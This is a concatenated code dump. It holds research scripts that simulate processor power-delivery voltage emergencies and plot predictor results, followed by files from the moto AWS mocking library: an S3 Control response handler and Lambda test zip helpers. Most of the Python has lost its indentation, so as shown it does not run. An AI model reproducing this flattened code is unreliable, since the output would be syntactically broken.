stat_name = line.split()[0].split('.')[-1].split(':')[0]
func = getattr(self, stat_name, False)
if func:
func(line)
def dump(self):
print('******* CYCLE: ',self.cycle,'*********')
print('SUPPLY CURRENT: ', self.supply_curr)
print('SUPPLY VOLTAGE: ', self.supply_volt)
#print('SUPPLY VOLTAGE_prev: ', self.supply_volt_prev)
print('ANCHOR PC: ', self.anchorPC_var)
#print("EVENTS: ", [event_map[e] for e in self.new_events_var])
# print("New Events : ", " ".join([event_map[i] for i in self.new_events_var]) )
print("***********************************")
def accuracy(action,VE,LEAD_TIME_CAP):
bins = dict()
act_bins = dict()
for i,ve in enumerate(VE):
if ve:
for j in range(0,LEAD_TIME_CAP):
if i-j < 0: break
if action[i-j]:
if j in bins.keys(): bins[j] += 1
else: bins[j] = 1
break
for j in range(0,LEAD_TIME_CAP):
if i-j < 0 or (VE[i-j] and j>0): break
if action[i-j]:
if j in act_bins.keys(): act_bins[j] += 1
else: act_bins[j] = 1
# print(bins)
# print(act_bins)
xvar = [0]
hits = [0]
false_neg = [100]
running_sum = 0
VE_count = sum(VE)
for key in sorted(bins.keys()):
running_sum += bins[key]
false_neg.append(100*(VE_count - running_sum) / VE_count)
xvar.append(key)
hits.append(100 * running_sum / VE_count)
# print(hits)
# print(xvar)
false_pos_x = [0]
false_pos = [100]
action_count = sum(action)
running_sum = 0
for k, v in sorted(act_bins.items()):
running_sum += v
false_pos.append(100*(action_count - running_sum) / action_count)
false_pos_x.append(k)
if (xvar[-1] < false_pos_x[-1]):
xvar.append(false_pos_x[-1])
hits.append(hits[-1])
false_neg.append(false_neg[-1])
if (xvar[-1] > false_pos_x[-1]):
false_pos_x.append(xvar[-1])
false_pos.append(false_pos[-1])
# print(false_neg)
# print(false_pos)
return [xvar,hits,false_neg,false_pos_x,false_pos]
TEST_LIST_spec=[
#"400.perlbench", NO BINARIES
"401.bzip2",
"403.gcc",
"410.bwaves",
#"416.gamess", NO BINARIES
"429.mcf",
"433.milc",
"434.zeusmp",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"447.dealII",
"450.soplex",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
"470.lbm",
"471.omnetpp",
"473.astar",
# "481.wrf", \
# "482.sphinx3", \
# "983.xalancbmk", \
# "998.specrand", \
# "999.specrand" \
]
TEST_LIST_mi = [
"basicmath",
"bitcnts",
"blowfish_decrypt",
"blowfish_encrypt",
"qsort",
"susan_smooth",
# "susan_edge",
# "susan_corner",
"dijkstra",
"rijndael_decrypt",
# "rijndael_encrypt",
"sha",
"crc",
"fft",
"ffti",
"toast",
"untoast"
]
```
#### File: jimmy_plot/deprecated/heatmap.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import decimal
import numpy as np
import os
TEST_LIST_spec=[
# "400.perlbench", NO BINARIES
# "401.bzip2",
# "403.gcc",
# "410.bwaves",
# # "416.gamess", NO BINARIES
"429.mcf",
"433.milc",
# "434.zeusmp",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
# "447.dealII",
# "450.soplex",
"453.povray",
"454.calculix",
"456.hmmer",
# "458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# # "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
# # "983.xalancbmk", \
# # "998.specrand", \
# # "999.specrand" \
]
def plot(x,y,num_ves):
fig, ax = plt.subplots()
im = ax.imshow(num_ves)
# We want to show all ticks...
ax.set_xticks(np.arange(len(x)))
ax.set_yticks(np.arange(len(y)))
# ... and label them with the respective list entries
ax.set_xticklabels(x)
ax.set_yticklabels(y)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(len(y)):
for j in range(len(x)):
val = str(round(num_ves[i, j]*100,1))
text = ax.text(j, i, val,
ha="center", va="center", color="w")
FONTSIZE = 20
ax.set_title("Percent VE not Mitigated - lower is better", fontsize = FONTSIZE)
ax.set_xlabel("Throttle Duration", fontsize = FONTSIZE)
ax.set_ylabel("Lead Time")
fig.set_size_inches(18.5, 18.5)
HOME = os.environ['HOME']
DATE = '4-2-2021_'
NAME = 'HEATMAP qsort'
file_dir = HOME+ '/plot/' + DATE + NAME +'.png'
plt.savefig(file_dir, dpi=300)
print(file_dir)
def run_all(load_paths):
total_ves = 0
raw_data = np.load(load_paths[0])
x = []
y = []
for i in raw_data:
x.append(i[0])
y.append(i[1])
x = list(set(x))
x.sort()
y = list(set(y))
y.sort()
num_ves = np.zeros((len(y), len(x)))
for load_path in load_paths:
raw_data = np.load(load_path)
total_ves += raw_data[0][2]
for i in raw_data:
x_ind = x.index(i[0])
y_ind = y.index(i[1])
num_ves[y_ind][x_ind] += i[2]
    num_ves = np.true_divide(num_ves, total_ves)
plot(x,y,num_ves)
def run(load_path):
raw_data = np.load(load_path)
total_ves = raw_data[0][2]
x = []
y = []
for i in raw_data:
x.append(i[0])
y.append(i[1])
x = list(set(x))
x.sort()
y = list(set(y))
y.sort()
num_ves = np.zeros((len(y), len(x)))
for i in raw_data:
x_ind = x.index(i[0])
y_ind = y.index(i[1])
num_ves[y_ind][x_ind] = i[2]/total_ves
plot(x,y,num_ves)
if __name__ == "__main__":
HOME = os.environ['HOME']
# load_paths = []
# for tn in TEST_LIST_spec:
# test_name = tn + '_35_500000_DESKTOP_IdealSensor'
# load_path = os.path.join(HOME,'plot/data')
# load_path = os.path.join(load_path,test_name+'_lead_time_sweep.npy')
# load_paths.append(load_path)
# run_all(load_paths)
test_name = 'qsort_lead_time_sweep'
load_path = os.path.join(HOME,'plot/data')
load_path = os.path.join(load_path,test_name+'.npy')
# for tn in TEST_LIST_spec:
# run(tn+'_35_500000_DESKTOP_IdealSensor')
run(load_path)
```
#### File: jimmy_plot/deprecated/pc_ve_dist.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
import struct
import os
from functools import reduce
import time
from collections import defaultdict
from cython.sim_pdn import get_volt_wrapper
from cython.ve_dist_sim import ve_dist_wrapper
def get_data(test_name,file_name,_dtype):
output_dir = 'output_4_9_vedist/gem5_out'
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir)
file_path = os.path.join(file_path,test_name)
file_path = os.path.join(file_path,file_name)
print(file_path)
print('loading...')
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
def run():
VDC = 1.4
THRES = 1.3
L = 20e-12
C = 1.32e-06
R = 3.2e-3
CLK = 4E9
tn = '459.GemsFDTD_130_1000000_DESKTOP_HarvardPowerPredictorMitigation'
pc_data = get_data(tn, 'taken_branch.bin',np.uint)
power = get_data(tn, 'power.bin', np.double)
curr = np.true_divide(power, VDC)
print('1. getting voltage...')
[_,ve_cycle] = get_volt_wrapper(curr,THRES,L,C,R,VDC,CLK)
print(' done!')
print('2. calculating stats...')
(avg_ve_dist,perc_pc,pc_stnd_dev,total_pcs,pc_list,ret_data) = ve_dist_wrapper(pc_data,ve_cycle)
perc_pc = [i*1000 for i in perc_pc]
for i in range(30,90):
perc_pc[i] += perc_pc[i+400]/3
perc_pc[i]/=2
print(' done!')
HOME = os.environ['HOME']
DATE = '5-4'
fig, (ax,bx) = plt.subplots(nrows=2, ncols=1)
fig.set_size_inches(8.5, 10.5)
# ax2 = ax.twinx()
# ax.plot(range(len(avg_ve_dist)), avg_ve_dist,linewidth=0.5, color='black', label="cycles to VE")
ax.plot(range(len(perc_pc)), perc_pc,linewidth=0.5, color='blue', alpha=0.5, label="percent of taken branches")
# ax.plot(range(len(pc_stnd_dev)), pc_stnd_dev,linewidth=0.5, color='blue', alpha=0.5, label="percent of taken branches")
ax.set_title('Standard Deviation of Distance from Branchs to VE')
ax.set_xlim([0,500])
ax.set_xlabel('Cycles Before VE')
ax.set_ylabel('Standard Deviation (Cycles)')
# bx.set_xlabel('taken branch')
# bx.set_ylabel('distance to VE')
# ax2.set_ylabel('percent of taken branches', fontsize=18)
# ax.set_xlim([0,1500])
# ax.set_ylim([0,1000])
plot_path = HOME+'/plot/' + DATE + 'gems_long_test_ve_dist' + '.png'
plt.savefig(plot_path, dpi=150)
print(plot_path)
if __name__ == "__main__":
run()
```
#### File: jimmy_plot/deprecated/pdn_test.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
from file_read_backwards import FileReadBackwards
import os, util
from functools import reduce
class PDN:
def __init__(self, L, C, R, VDC, CLK):
self.L = L
self.C = C
self.R = R
self.VDC = VDC
self.CLK = CLK
self.vout_2_cycle_ago = VDC
self.vout_1_cycle_ago = VDC
self.iout_1_cycle_ago = 0
def reset(self):
self.vout_2_cycle_ago = self.VDC
self.vout_1_cycle_ago = self.VDC
self.iout_1_cycle_ago = 0
def get_curr(self, current):
ts = 1/self.CLK
LmulC = self.L*self.C
LdivR = self.L/self.R
vout = self.VDC*ts**2/(LmulC) \
+ self.vout_1_cycle_ago*(2 - ts/(LdivR)) \
+ self.vout_2_cycle_ago*(ts/(LdivR) \
- 1 - ts**2/(LmulC)) \
- current*self.R*ts**2/(LmulC) \
- (1/self.C)*ts*(current - self.iout_1_cycle_ago)
self.vout_2_cycle_ago = self.vout_1_cycle_ago
self.vout_1_cycle_ago = vout
self.iout_1_cycle_ago = current
return vout
VDC = 1.4
pdn = PDN(
# L = 30e-12,
# C = 1.12e-06,
# R = 0.0032,
L = 30e-12,
C = 1e-06,
R = 0.003,
VDC = VDC,
CLK = 4E9,
)
power_stc = 10
power_dyn = 20
voltage = []
power = []
when_load = [0]*320 + [0.3]*270 + [1]*400 #true is load, false is no load
when_load = when_load*3
for load in when_load:
if load:
p = (power_stc+power_dyn*load)
else:
p = (power_stc)
power.append(p)
voltage.append(pdn.get_curr(p/VDC))
voltage_t = []
power_t = []
throttle_start_cycles = [550] # must always be even
while throttle_start_cycles[-1] < len(when_load):
throttle_start_cycles.append(throttle_start_cycles[-1] + 1000)
throttle_end_cycles = [] # must always be even
throttle_time = 100
for i in throttle_start_cycles:
throttle_end_cycles.append(i+throttle_time)
is_throttle = False
pdn.CLK = 4E9
pdn.reset()
i=0
while i < len(when_load):
load = when_load[i]
if is_throttle and load:
p = power_dyn*when_load[i]/2 + power_stc
elif not is_throttle and load:
p = power_dyn*when_load[i] + power_stc
elif is_throttle and not load or not is_throttle and not load:
p = power_stc
if throttle_start_cycles[0] == i:
throttle_start_cycles.pop(0)
is_throttle = True
pdn.CLK = 2E9
if throttle_end_cycles[0] == i:
throttle_end_cycles.pop(0)
is_throttle = False
pdn.CLK = 4E9
volt = pdn.get_curr(p/VDC)
power_t.append(p)
voltage_t.append(volt)
if is_throttle:
voltage_t.append(volt)
power_t.append(p)
i+=2
else:
i+=1
fig, (ax1, ax2) = plt.subplots(2, 1)
fig.suptitle(throttle_time, fontsize=16)
fig.set_size_inches(12.5, 7.5)
ax1.plot(range(len(voltage)), voltage, label = 'no throttle')
ax1.plot(range(len(voltage_t)), voltage_t, label = 'throttle')
ax1.legend()
ax1.set_ylim([min(min(voltage)-0.02,min(voltage_t)),VDC+0.03])
# ax1.set_xticks(range(0, len(voltage), 150))
# ax.set_xlim([950,1100])
ax2.plot(range(len(power)), power, label = 'no throttle')
ax2.plot(range(len(power_t)), power_t, label = 'throttle')
ax2.legend()
ax2.set_ylim([0,max(power)*1.1])
HOME = os.environ['HOME']
file_dir = HOME+ '/plot/5-4-pdn_test2.png'
plt.savefig(file_dir, dpi=300)
print(file_dir)
print('throttle min power: ', min(voltage_t))
```
#### File: python/jimmy_plot/get_speedup.py
```python
from file_read_backwards import FileReadBackwards
TEST_LIST_spec=[
"429.mcf",
"433.milc",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
]
fdir = "/home/jimmyjz2/output_9_16_harvard_inf-table_lt=[0:50]_sig=64/gem5_out/"
post_fix = "_150_1000000_DESKTOP_HarvardPowerPredictorMitigation/stats.txt"
# fdir2 = "/home/jimmyjz2/output_9_15_harvard_inf-table_lt=[0:50]_sig=64/gem5_out/"
# post_fix2 = "_100_1000000_DESKTOP_HarvardPowerPredictor/stats.txt"
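# calc_speedup() estimates the benefit of running at TEST_CLK instead of
# BASELINE_CLK when a predictor mitigates voltage emergencies: data_h and
# data_fp are per-benchmark hit and false-positive rates, each missed emergency
# is charged ROLL_BACK_PENALTY cycles, and each hit or false positive is charged
# a throttling penalty proportional to THROTTLE_DUR; it prints the average
# percent speedup over the baseline across all benchmarks.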
def calc_speedup(data_h,data_fp):
num_preds = []
num_ves = []
num_cycles = []
def get_val(line):
str_num = line.split()[1]
return int(str_num.split(".")[0])
for idx, test in enumerate(TEST_LIST_spec):
path = fdir + test + post_fix
with FileReadBackwards(path, encoding="utf-8") as frb:
for line in frb:
if "system.cpu.powerPred.hit_rate::total" in line:
num_ves.append(get_val(line))
if "system.cpu.numCycles" in line:
num_cycles.append(get_val(line))
if "system.cpu.powerPred.total_actions" in line:
num_preds.append(get_val(line))
if (len(num_ves)==idx+1 and len(num_cycles)==idx+1 and len(num_preds)==idx+1):
num_ves[-1] = num_cycles[-1]/789
break
num_preds = [(data_h[i]+data_fp[i])*1000 for i in range(len(num_ves))]
BASELINE_CLK = 3.3E9
TEST_CLK = 4E9
ROLL_BACK_PENALTY = 500
THROTTLE_DUR = 70
speedup=0
for idx, test in enumerate(TEST_LIST_spec):
# print(test)
total_ve = num_ves[idx]
total_preds = num_preds[idx]
num_hits = int(data_h[idx]*total_ve)
num_misses = int((1-data_h[idx])*total_ve)
num_fps = int(data_fp[idx]*total_preds)
original_time = 150000000/BASELINE_CLK
new_time = 150000000/TEST_CLK
#false negatives
miss_time= ROLL_BACK_PENALTY*(1/TEST_CLK)*num_misses
#false positives
hit_time= num_hits*THROTTLE_DUR*(1/TEST_CLK/2)
#hits
fp_time= num_fps*THROTTLE_DUR*(1/TEST_CLK/2)
new_time += miss_time + fp_time + hit_time
# print(new_time/original_time)
# print(num_cycles[idx]/(total_ve+1))
# print(data_h[idx], data_fp[idx])
# print(num_misses, num_fps, num_hits)
# print(round(miss_time/new_time,2), round(fp_time/new_time,2), round(hit_time/new_time,2))
speedup += 100*(1 - new_time/original_time)
# print()
print(speedup / len(TEST_LIST_spec))
def calc_speedup_oracle(voltages, ve_cycles, tests):
BASELINE_CLK = 3.3E9
TEST_CLK = 4E9
ROLL_BACK_PENALTY = 500
THROTTLE_DUR = 70
speedup=0
for idx, test in enumerate(tests):
# print(test)
total_ve = len(ve_cycles)
total_preds = len(ve_cycles)
num_hits = len(ve_cycles)
num_misses = 0
num_fps = 0
original_time = len(voltages)/BASELINE_CLK
new_time = len(voltages)/TEST_CLK
#false negatives
miss_time= ROLL_BACK_PENALTY*(1/TEST_CLK)*num_misses
#false positives
hit_time= num_hits*THROTTLE_DUR*(1/TEST_CLK/2)
#hits
fp_time= num_fps*THROTTLE_DUR*(1/TEST_CLK/2)
new_time += miss_time + fp_time + hit_time
# print(new_time/original_time)
# print(num_cycles[idx]/(total_ve+1))
# print(data_h[idx], data_fp[idx])
# print(num_misses, num_fps, num_hits)
# print(round(miss_time/new_time,2), round(fp_time/new_time,2), round(hit_time/new_time,2))
speedup += 100*(1 - new_time/original_time)
    avg_speedup = speedup / len(TEST_LIST_spec)
    print(avg_speedup)
    return avg_speedup
#[40,0]
#1.344 thres, 1.4vdc harvard processor
data_h = [0.97, 0.93, 0.95, 0.65, 0.94, 0.55, 0.94, 0.67, 0.93, 0.82, 0.95, 0.35, 0.99, 0.950, 0.96, 0.32, 0.35, 0.98, 0.75]
data_fp =[0.14, 0.12, 0.08, 0.21, 0.09, 0.36, 0.03, 0.43, 0.06, 0.07, 0.04, 0.43, 0.04, 0.080, 0.10, 0.22, 0.43, 0.10, 0.20]
calc_speedup(data_h,data_fp)
#1.344 jimmy predictor
data_h = [0.97, 0.94, 0.95, 0.67, 0.95, 0.72, 0.95, 0.75, 0.93, 0.83, 0.94, 0.44, 0.99, 0.960, 0.96, 0.39, 0.50, 0.98, 0.78]
data_fp =[0.13, 0.14, 0.08, 0.15, 0.08, 0.30, 0.023,0.33, 0.05, 0.07, 0.04, 0.30, 0.04, 0.085, 0.10, 0.18, 0.37, 0.10, 0.20]
calc_speedup(data_h,data_fp)
#[40,16]
#1.344 thres, 1.4vdc harvard processor
data_h = [0.94, 0.88, 0.84, 0.58, 0.91, 0.50, 0.82, 0.62, 0.90, 0.76, 0.92, 0.31, 0.93, 0.87, 0.75, 0.30, 0.31, 0.81, 0.70]
data_fp =[0.21, 0.31, 0.12, 0.27, 0.13, 0.57, 0.12, 0.47, 0.16, 0.17, 0.12, 0.56, 0.044,0.12, 0.18, 0.27, 0.51, 0.18, 0.27]
calc_speedup(data_h,data_fp)
#1.344 jimmy predictor
data_h = [0.96, 0.92, 0.94, 0.65, 0.88, 0.68, 0.90, 0.74, 0.91, 0.79, 0.94, 0.38, 0.98, 0.83, 0.86, 0.37, 0.43, 0.96, 0.73]
data_fp =[0.14, 0.23, 0.09, 0.17, 0.13, 0.36, 0.04, 0.35, 0.05, 0.13, 0.05, 0.32, 0.04, 0.095,0.14, 0.23, 0.43, 0.11, 0.26]
calc_speedup(data_h,data_fp)
calc_speedup([1]*len(data_h), [1]*len(data_fp))
```
#### File: python/jimmy_plot/playground3.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import os
import math
from cython.sim_pdn import get_volt_wrapper
TEST_LIST_spec=[
"429.mcf",
"433.milc",
"435.gromacs",
"436.cactusADM",
"437.leslie3d",
"444.namd",
"445.gobmk",
"453.povray",
"454.calculix",
"456.hmmer",
"458.sjeng",
"459.GemsFDTD",
"462.libquantum",
"464.h264ref",
# "470.lbm",
"471.omnetpp",
"473.astar",
"481.wrf", \
"482.sphinx3", \
]
def get_data(output_dir, file_name, _dtype):
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir, file_name)
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
#PARAMS
SUBPLOT_LEN = 1000
MAX_SUBPLOTS = 3
OFFSET = 0
FIGWIDTH = 30
def plot(data, ve_cycles, name, labels=None):
num_datapoints = len(data[0])
ve_cycles = list(ve_cycles)
HOME = os.environ['HOME']
DATE = "9-7"
plot_path = HOME+'/plot/' + DATE +'_'+name + '.jpg'
start = OFFSET
stop = OFFSET + SUBPLOT_LEN
subplot_indices = []
while stop < num_datapoints:
subplot_indices.append((start,stop))
start += SUBPLOT_LEN
stop += SUBPLOT_LEN
#add the remainder data
if stop > num_datapoints:
subplot_indices.append((start,num_datapoints-1))
if len(subplot_indices) > MAX_SUBPLOTS:
subplot_indices = subplot_indices[:MAX_SUBPLOTS]
print("Plotting cycles {} to {}!".format(subplot_indices[0][0], subplot_indices[-1][1]))
print("{} number of plots!".format(len(subplot_indices)))
fig, axs = plt.subplots(len(subplot_indices),
figsize=(FIGWIDTH,len(subplot_indices)*2))
def plot_subplot(start_idx, stop_idx, data, ax_idx, highlight_cycles):
y = range(start_idx,stop_idx)
axs[ax_idx].margins(x=0)
for idx, series in enumerate(data):
x = series[start_idx:stop_idx]
if labels:
axs[ax_idx].plot(y, x, linewidth=1, label=labels[idx])
else:
axs[ax_idx].plot(y, x, linewidth=1)
axs[ax_idx].xaxis.set_major_locator(plt.MaxNLocator(20))
# axs[ax_idx].set_ylim([1.3,1.4])
for hl in highlight_cycles:
axs[ax_idx].axvspan(hl, hl+1, color='red', alpha=0.5)
if labels:
axs[ax_idx].legend()
if len(ve_cycles)>0:
ve_cycles.sort()
while ve_cycles[0] < subplot_indices[0][0]:
ve_cycles.pop(0)
for n in range(0,len(subplot_indices)):
x_start = subplot_indices[n][0]
x_end = subplot_indices[n][1]
subplot_ve_cycles = []
if len(ve_cycles)>0:
while ve_cycles[0] < x_end:
subplot_ve_cycles.append(ve_cycles.pop(0))
print("Plotting subplot: {}/{}".format(n+1,len(subplot_indices)))
plot_subplot(x_start, x_end, data, n, subplot_ve_cycles)
print("Saving to: {}".format(plot_path))
plt.savefig(plot_path, dpi=90, bbox_inches='tight', format='jpg')
def get_static_pwr(power):
start = 1000
end = 2000
return np.average(np.sort(power)[start:end])
def print_power(voltage, power, ve_cycles):
print("{} cycles simulated".format(len(power)))
print("Total Emergencies: {}".format(len(ve_cycles)))
if (len(ve_cycles) > 1):
print("Cycles/VE: {}".format(len(power)/len(ve_cycles)))
static_pwr = get_static_pwr(power)
avg_pwr = round(np.sum(power)/len(power),4)
avg_dyn_pwr = round((np.sum(power) - static_pwr*len(power))/len(power),4)
print("Avg Power: {}, Avg Dyn power {}, Static Pwr {}".format(avg_pwr, avg_dyn_pwr, static_pwr))
print("Avg Voltage: {}".format(np.sum(voltage)/len(voltage)))
bin_width = int(len(voltage)/5)
bins = [0]*math.ceil(len(voltage)/bin_width)
for i in ve_cycles:
idx = math.floor(i/bin_width)
bins[idx] += 1
for idx,val in enumerate(bins):
start_cycle = idx*bin_width
end_cycle = min((idx+1)*bin_width,len(voltage))-1
print("cycles {}:{}- {} emergencies".format(start_cycle,end_cycle,val))
print()
def diff(orig, new):
    # element-wise ratio of the new power trace to the original one
    perc_diff = np.divide(new, orig)
    # keep only the entries where the ratio exceeds 0.01
    perc_diff = perc_diff[np.where(perc_diff > 0.01)]
    print(perc_diff.shape)
def get_voltage(full_dir, dtype,
THRES,L,C,R,VDC,CLK,
clk_offset=0):
if not os.path.isfile(full_dir+'/power.bin'):
print("Skipping, not found {}".format(full_dir+'/power.bin'))
return None
power = get_data(full_dir, 'power.bin', dtype)
speedup_clk = CLK+clk_offset
if clk_offset != 0:
speedup_clk = CLK+clk_offset
static_pwr_slope = 0.07850192802056581 #watts/ghz
# dyn_pwr_slope = 0.33784768637532137
dyn_pwr_scale = 0.99192848464
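    # Frequency re-scaling model applied below (matches the prints and the arithmetic):
    #   static (leakage) power   : P_static_new = P_static + static_pwr_slope * (clk_offset / 1e9)   [slope in W/GHz]
    #   dynamic (switching) power: P_dyn_new    = P_dyn * (speedup_clk / CLK) * dyn_pwr_scale
    # i.e. leakage grows linearly with the added clock frequency, while switching power
    # scales almost proportionally with frequency.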
static_pwr = get_static_pwr(power)
dyn_power_series = power - static_pwr
static_power_series = np.subtract(power, dyn_power_series)
print("STATIC PWR offset: {} + {} = {}".format(
np.average(static_power_series),
static_pwr_slope*(clk_offset/1E9),
np.average(static_power_series + static_pwr_slope*(clk_offset/1E9))))
print("DYNMIC PWR offset: {}*{} = {}".format(
np.average(dyn_power_series),
(speedup_clk/CLK)*dyn_pwr_scale,
np.average(dyn_power_series * (speedup_clk/CLK)*dyn_pwr_scale)))
print(speedup_clk/CLK)
dyn_power_series = dyn_power_series * (speedup_clk/CLK)*dyn_pwr_scale
static_power_series = static_power_series + static_pwr_slope*(clk_offset/1E9)
power = np.add(static_power_series, dyn_power_series)
# print("2. getting current")
curr = np.true_divide(power, VDC)
curr = curr.astype(np.double)
# print('3. getting voltage...')
[voltage,ve_cycle] = get_volt_wrapper(curr,THRES,L,C,R,VDC,speedup_clk)
print_power(voltage, power, ve_cycle)
return (power,voltage,ve_cycle)
def run(print_stats=False):
VDC = 1.4
THRES = 1.36
L = 20e-12
C = 1.32e-6
R = 3.2e-3
CLKS = [4E9, 2E9]
HOME = os.environ['HOME']
output_dirs = ["output_10_8/gem5_out"]
tests = ["482.sphinx3"]
post_fixes = ["_5_1000000_DESKTOP_HarvardPowerPredictor_400000000",
"_5_1000000_DESKTOP_HarvardPowerPredictor_200000000"]
dtype = np.single
cnt = 0
power_data = []
voltage_data = []
ve_cycles_data = []
power_datas_dirs = []
for out_dir in output_dirs:
for tn in tests:
for pf in post_fixes:
cnt+=1
power_datas_dirs.append(os.path.join(HOME, out_dir, tn+pf))
for i, full_dir in enumerate(power_datas_dirs):
res = get_voltage(full_dir, dtype,
THRES,L,C,R,VDC,CLKS[i])
        if res is None:
continue
power_data.append(res[0])
voltage_data.append(res[1])
ve_cycles_data.append(res[2])
(power, voltage, ve_cycles) = res
res = get_voltage(power_datas_dirs[-1], dtype,
THRES,L,C,R,VDC,2E9, clk_offset=2E9)
power_data.append(res[0])
voltage_data.append(res[1])
ve_cycles_data.append(res[2])
power_datas_dirs.append("recreation 2ghz->4ghz")
    diff(power_data[0], power_data[-1])
plot(power_data, [], '10_7_power_'+tn+str(cnt), labels=power_datas_dirs)
if __name__ == "__main__":
run(True)
```
#### File: python/jimmy_plot/prediction_test.py
```python
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import math
import struct
import os
from functools import reduce
import time
import sim_pdn
from collections import defaultdict
import ve_dist_sim
import predictor_sim
import test
def get_data(test_name,file_name,_dtype):
output_dir = 'output_4_9_vedist/gem5_out'
HOME = os.environ['HOME']
file_path = os.path.join(HOME,output_dir)
file_path = os.path.join(file_path,test_name)
file_path = os.path.join(file_path,file_name)
print(file_path)
print('loading...')
with open(file_path, "rb") as binaryfile :
myArr = bytearray(binaryfile.read())
data = np.frombuffer(myArr, dtype=_dtype)
return data
def run():
VDC = 1.4
THRES = 1.3
L = 20e-12
C = 1.32e-06
R = 3.2e-3
CLK = 4E9
tn = '459.GemsFDTD_130_1000000_DESKTOP_HarvardPowerPredictorMitigation'
pc_data = get_data(tn, 'taken_branch.bin',np.uint64)
power = get_data(tn, 'power.bin', np.double)
curr = np.true_divide(power, VDC)
print('1. getting voltage...')
[voltage,ve_cycle] = sim_pdn.get_volt_wrapper(curr,THRES,L,C,R,VDC,CLK)
print(' done!')
print('2. running predictor...')
(hr,fp) = predictor_sim.run_prediction_wrapper(pc_data, ve_cycle, voltage)
print(' done!')
print("hit rate: ", hr)
print("false pos rate:", fp)
if __name__ == "__main__":
run()
``` |
{
"source": "JimNero009/moto",
"score": 2
} |
#### File: moto/s3control/responses.py
```python
import json
import xmltodict
from moto.core.responses import BaseResponse
from moto.core.utils import amzn_request_id
from moto.s3.exceptions import S3ClientError
from moto.s3.responses import S3_PUBLIC_ACCESS_BLOCK_CONFIGURATION
from .models import s3control_backend
class S3ControlResponse(BaseResponse):
@classmethod
def public_access_block(cls, request, full_url, headers):
response_instance = S3ControlResponse()
try:
return response_instance._public_access_block(request, headers)
except S3ClientError as err:
return err.code, {}, err.description
@amzn_request_id
def _public_access_block(self, request, headers):
if request.method == "GET":
return self.get_public_access_block(headers)
elif request.method == "PUT":
return self.put_public_access_block(request, headers)
elif request.method == "DELETE":
return self.delete_public_access_block(headers)
def get_public_access_block(self, headers):
account_id = headers["x-amz-account-id"]
public_block_config = s3control_backend.get_public_access_block(
account_id=account_id,
)
template = self.response_template(S3_PUBLIC_ACCESS_BLOCK_CONFIGURATION)
return 200, {}, template.render(public_block_config=public_block_config)
def put_public_access_block(self, request, headers):
account_id = headers["x-amz-account-id"]
pab_config = self._parse_pab_config(request.body)
s3control_backend.put_public_access_block(
account_id, pab_config["PublicAccessBlockConfiguration"]
)
return 201, {}, json.dumps({})
def delete_public_access_block(self, headers):
account_id = headers["x-amz-account-id"]
s3control_backend.delete_public_access_block(account_id=account_id,)
return 204, {}, json.dumps({})
def _parse_pab_config(self, body):
parsed_xml = xmltodict.parse(body)
parsed_xml["PublicAccessBlockConfiguration"].pop("@xmlns", None)
return parsed_xml
```
#### File: tests/test_awslambda/utilities.py
```python
import boto3
import io
import pytest
import time
import zipfile
from botocore.exceptions import ClientError
from moto import settings, mock_iam
from uuid import uuid4
_lambda_region = "us-west-2"
def _process_lambda(func_str):
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "w", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", func_str)
zip_file.close()
zip_output.seek(0)
return zip_output.read()
def get_test_zip_file1():
pfunc = """
def lambda_handler(event, context):
print("custom log event")
return event
"""
return _process_lambda(pfunc)
def get_test_zip_file2():
func_str = """
import boto3
def lambda_handler(event, context):
ec2 = boto3.resource('ec2', region_name='us-west-2', endpoint_url='http://{base_url}')
volume_id = event.get('volume_id')
vol = ec2.Volume(volume_id)
return {{'id': vol.id, 'state': vol.state, 'size': vol.size}}
""".format(
base_url="motoserver:5000"
if settings.TEST_SERVER_MODE
else "ec2.us-west-2.amazonaws.com"
)
return _process_lambda(func_str)
def get_test_zip_file3():
pfunc = """
def lambda_handler(event, context):
print("Nr_of_records("+str(len(event['Records']))+")")
print("get_test_zip_file3 success")
return event
"""
return _process_lambda(pfunc)
def get_test_zip_file_error():
pfunc = """
def lambda_handler(event, context):
raise Exception('I failed!')
"""
return _process_lambda(pfunc)
def get_test_zip_largeresponse():
pfunc = """
def lambda_handler(event, context):
x = ["xxx" for x in range(10 ** 6)]
return {"statusCode": 200, "body": x}
"""
return _process_lambda(pfunc)
def get_zip_with_multiple_files():
pfunc = """
from utilities import util_function
def lambda_handler(event, context):
x = util_function()
event["msg"] = event["msg"] + x
return event
"""
ufunc = """
def util_function():
return "stuff"
"""
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "a", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", pfunc)
zip_file.close()
zip_file = zipfile.ZipFile(zip_output, "a", zipfile.ZIP_DEFLATED)
zip_file.writestr("utilities.py", ufunc)
zip_file.close()
